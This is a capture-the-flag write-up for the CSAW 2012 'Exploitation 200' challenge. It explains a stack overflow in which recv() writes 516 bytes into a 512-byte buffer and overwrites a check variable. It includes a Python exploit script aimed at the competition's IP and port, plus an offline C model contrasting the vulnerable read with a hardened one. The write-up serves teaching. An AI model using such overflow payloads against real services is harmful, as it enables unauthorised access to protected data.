CSAW 2012 – Exploitation 200
```
$ md5sum exp200
979fd4900ef48a1b958d6d555c4c35b5  exp200
$ file exp200
exp200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x94e984380a61d713c1a614f40eeee92c533593d4, not stripped
```
Opening the binary in IDA reveals a vulnerable function:
```c
int __cdecl handle(int fd)
{
  char buf[512]; // [sp+1Ch] [bp-20Ch]@1
  int v3; // [sp+21Ch] [bp-Ch]@1

  v3 = 0;
  memset(buf, 0, sizeof(buf));
  send(fd, "Wecome to my first CS project.\nPlease type your name: ", 0x37u, 0);
  recv(fd, buf, 516u, 0);
  buf[511] = 0;
  if ( !strcmp(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v3 = 1;
  if ( v3 )
  {
    ::fd = (int)fopen("./key", "r");
    __isoc99_fscanf(::fd, "%s", buf);
    recv(fd, 0, 0x10u, 64); // flags=DONT_WAIT
    send(fd, buf, 0x200u, 0);
  }
  return close(fd);
}
```
One can simply send "AAAAAAAAAAAAAAAAAAAAAAAAAA\n" as the name and the server hands over the key.

Or do it the hard way: `recv` reads up to 516 bytes into the 512-byte `buf`, and `v3` sits at `bp-0xC`, exactly 0x200 = 512 bytes past the start of `buf` (`bp-0x20C`). The four extra bytes therefore overwrite `v3`; `buf[511] = 0` only terminates the string for `strcmp`, it does not undo the write. Any nonzero little-endian value in those four bytes makes `if ( v3 )` true and the key is sent. 🙂
```python
import socket

service_port = 54321
ip = "128.238.66.218"

s = socket.create_connection((ip, service_port))
# 512 bytes fill buf; the next 4 bytes land on v3 and set it to 1 (little-endian)
buf = b'B' * 512 + b'\x01\x00\x00\x00'
print(s.recv(4096))   # banner and "Please type your name: " prompt
s.send(buf)
print(s.recv(4096))   # the key
```
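To show the overwrite without the CTF server, here is an added example (not code from the original writeup or from the challenge binary) that models `handle()`'s frame offline. The `struct frame` pins `v3` at exactly 512 bytes past `buf`, matching the IDA offsets; `fake_recv` is a stand-in for `recv()` that copies a constructed client message; `build_payload` produces the same 516-byte payload as the script above. A hardened variant caps the read at `sizeof(buf) - 1` so the flag can no longer be reached. Names and the little-endian host assumption are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed model of handle()'s frame. In the binary buf is at bp-0x20C
 * and v3 at bp-0xC, i.e. v3 starts exactly 0x200 = 512 bytes into buf.
 * A struct pins that adjacency; a compiler is free to reorder real locals.
 */
struct frame {
    char buf[512];
    int  v3;
};

/* Stand-in for recv(): copy at most `max` bytes of the client's input. */
static size_t fake_recv(void *dst, size_t max, const uint8_t *in, size_t in_len)
{
    size_t n = in_len < max ? in_len : max;
    memcpy(dst, in, n);
    return n;
}

/* Same logic as the decompiled handle(): 516 bytes read into a 512-byte buf. */
int vulnerable_check(const uint8_t *in, size_t in_len)
{
    struct frame f;
    f.v3 = 0;
    memset(f.buf, 0, sizeof f.buf);
    fake_recv(&f, 516, in, in_len);              /* bytes 512..515 spill into v3 */
    f.buf[511] = 0;                              /* bounds strcmp, does not reset v3 */
    if (!strcmp(f.buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n"))
        f.v3 = 1;
    return f.v3;                                 /* nonzero => the key would be sent */
}

/* Fixed version: the read is capped at sizeof(buf) - 1, so v3 is untouchable. */
int hardened_check(const uint8_t *in, size_t in_len)
{
    struct frame f;
    f.v3 = 0;
    memset(f.buf, 0, sizeof f.buf);
    fake_recv(f.buf, sizeof f.buf - 1, in, in_len);
    f.buf[511] = 0;
    if (!strcmp(f.buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n"))
        f.v3 = 1;
    return f.v3;
}

/* The writeup's payload: 512 filler bytes, then v3 = 1 as a little-endian int
 * (the target is i386; this model assumes a little-endian host as well). */
size_t build_payload(uint8_t *out, size_t cap)
{
    if (cap < 516)
        return 0;
    memset(out, 'B', 512);
    out[512] = 0x01;
    out[513] = 0x00;
    out[514] = 0x00;
    out[515] = 0x00;
    return 516;
}

int main(void)
{
    uint8_t payload[516];
    size_t n = build_payload(payload, sizeof payload);
    printf("vulnerable: v3=%d\n", vulnerable_check(payload, n));
    printf("hardened:   v3=%d\n", hardened_check(payload, n));
    return 0;
}
```

With the payload, the vulnerable path returns `v3 == 1` even though the name never matched, while the hardened path returns 0; the legitimate name still passes both. Anything nonzero in the trailing four bytes works against the original, which is why `'B' * 516` would have done just as well.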